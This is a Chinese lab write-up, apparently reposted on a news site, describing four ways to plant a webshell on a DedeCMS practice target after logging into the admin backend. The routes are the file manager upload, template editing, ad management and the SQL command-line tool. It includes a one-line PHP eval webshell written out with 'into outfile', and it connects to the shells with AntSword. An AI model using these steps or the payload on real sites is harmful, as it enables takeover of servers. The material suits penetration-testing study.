当前位置: 首页 > news >正文

dedecms靶场(四种webshell姿势)

进入靶场

姿势一:过文件管理器上传WebShell

步骤一:登录后台 /dede

步骤二:核心-》文件式管理-》文件上传-》上传一句话木马

点击

步骤三:进行蚁剑连接

姿势二:修改模板文件拿WebShell

步骤一:模板-》默认模板管理-》index.htm-》修改-》添加一句话木马

步骤二:点击【生成】【更新主页HTML】将主页位置修改为【./index.php】点击 【生成静态】点击 【更新主页HTML】 再次访问站点首页可发现变化

步骤三:进行蚁剑连接

姿势三:后台任意命令执行拿WebShell

步骤一:模块-》广告管理-》增加一个新广告

添加一句话木马

点击代码

步骤二:进行蚁剑连接

姿势四:后台sql命令行工具拿WebShell

步骤一:系统-》sql命令行工具-》select '<?php @eval($_POST[cmd]);?>'into outfile "D:/phpstudy_pro/WWW/1.php"-》确认

步骤二:进行蚁剑连接


http://www.mrgr.cn/news/28195.html

相关文章:

  • 畅聊未来-- AIGC 的发展方向与趋势
  • 20.UE5UI预构造,开始菜单,事件分发器
  • [Admin] Dashboard Filter for Mix Report Types
  • lab2:docker基础实战
  • 使用 Python 和 OpenCV 实现摄像头人脸检测并截图
  • Spring Boot 中使用 @Transactional 注解配置事务管理
  • 【Go】Go语言中的数组基本语法与应用实战
  • 建模杂谈系列256 规则函数化改造
  • 速通汇编(五)认识段地址与偏移地址,CS、IP寄存器和jmp指令,DS寄存器
  • 【C++】多态
  • dedecms(四种webshell姿势)aspcms webshell漏洞复现
  • 从冯唐的成事心法 看SAP协助企业战略落地到信息化
  • kubernetes中pause容器的作用与源码详解
  • 神经网络_使用tensorflow对fashion mnist衣服数据集分类
  • OpenGL笔记二十一之几何类设计
  • 数组学习内容
  • 基于深度学习,通过病理切片直接预测HPV状态|文献速递·24-09-16
  • 进程间关系和守护进程
  • AG32 MCU的引脚特点及功耗说明
  • AIP接口调用
  • 8. Transforms的使用(三)-- Resize
  • 【C++】学完c语言后的c++基础知识补充!(命名空间、输入和输出、缺省函数、函数重载、引用、内联函数代替宏、nullptr代替NULL)
  • keil5进行stm32编程时常遇到的问题和ST-LINK在线仿真的连接问题
  • 哈哈哈,让 GitHub Copilot 用上 deepseek,性能不输 GPT-4,每月立即省 10 刀!
  • 为什么全双工不需要冲突检测
  • 1184. 公交站间的距离(24.9.16)